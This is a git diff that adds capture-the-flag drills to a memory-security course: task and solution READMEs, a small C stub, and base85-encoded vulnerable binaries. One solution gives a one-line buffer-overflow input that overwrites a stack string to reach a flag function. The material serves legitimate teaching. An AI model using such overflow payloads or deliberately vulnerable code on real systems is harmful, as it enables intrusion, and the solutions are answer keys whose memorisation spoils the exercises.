diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/main.c b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/main.c
new file mode 100644
index 00000000..3d50b907
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/main.c
@@ -0,0 +1,10 @@
+// SPDX-License-Identifier: BSD-3-Clause
+
+void helper(int a, char c);
+
+int main(void)
+{
+	helper(42, 'X');
+	return 0;
+}
+
diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/support/link2 b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/support/link2
new file mode 100644
index 0000000000000000000000000000000000000000..d9422c91ba5c985dbed880e03de2b8efa9af63c4
GIT binary patch
literal 5060
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
L6EMhzd}#j$Tp4K~

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/indirect-business/README.md b/chapters/memory-security/ctf/drills/tasks/indirect-business/README.md
new file mode 100644
index 00000000..cc6740ce
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/indirect-business/README.md
@@ -0,0 +1,8 @@
+# Indirect business
+
+The `buff-ovf` binary contains a classic vulnerability.
+Use the input to alter the data in your favor.
+
+If you experience a neural buffer overflow, take a look at the [relevant lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%2011%20-%20Buffer%20Management.%20Buffer%20Overflow/) and at [online examples](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85).
+
+If that still doesn't work, keep in mind that the great cybersecurity expert named Sun Tzu was a big proponent of bruteforce attacks.
diff --git a/chapters/memory-security/ctf/drills/tasks/indirect-business/solution/README.md b/chapters/memory-security/ctf/drills/tasks/indirect-business/solution/README.md
new file mode 100644
index 00000000..35b4b34c
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/indirect-business/solution/README.md
@@ -0,0 +1,6 @@
+# Solution
+
+Use the buffer overflow to overwrite a string on the stack.
+This is going to be copied to a global variable that is checked before calling the `get_flag()` function.
+
+`python -c 'import sys; sys.stdout.write("A"*10 + "Bye")' | ./buff-ovf`
diff --git a/chapters/memory-security/ctf/drills/tasks/indirect-business/support/buff-ovf b/chapters/memory-security/ctf/drills/tasks/indirect-business/support/buff-ovf
new file mode 100644
index 0000000000000000000000000000000000000000..4556e61d1152570c4d09a09c7b974df7c81666bc
GIT binary patch
literal 10220
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

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/look-at-him-go/README.md b/chapters/memory-security/ctf/drills/tasks/look-at-him-go/README.md
new file mode 100644
index 00000000..f9d37529
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/look-at-him-go/README.md
@@ -0,0 +1,7 @@
+# Look at him go
+
+The `dynamic` binary is executable this time and its sole purpose is to obtain the flag and place it somewhere in memory.
+No tricks here.
+> **TIP:** GDB is your friend.
+
+If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%202%20-%20Memory%20Operations.%20Introduction%20to%20GDB/Introduction%20to%20GDB/Reading/) and [this](https://stackoverflow.com/questions/5429137/how-to-print-register-values-in-gdb).
diff --git a/chapters/memory-security/ctf/drills/tasks/look-at-him-go/solution/README.md b/chapters/memory-security/ctf/drills/tasks/look-at-him-go/solution/README.md
new file mode 100644
index 00000000..ab8956bd
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/look-at-him-go/solution/README.md
@@ -0,0 +1,4 @@
+# Solution
+
+Run the executable with GDB, ideally with `gef`, `pwndbg`, or `peda`.
+As you step through, you will notice that the flag will appear in fragments in the display of the register contents (the flag string contains null characters placed specifically so that it would not be displayed all at once).
diff --git a/chapters/memory-security/ctf/drills/tasks/look-at-him-go/support/dynamic b/chapters/memory-security/ctf/drills/tasks/look-at-him-go/support/dynamic
new file mode 100644
index 0000000000000000000000000000000000000000..348e1f72fcbdd2ac386ef0608bab0153ca8b28e9
GIT binary patch
literal 10284
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
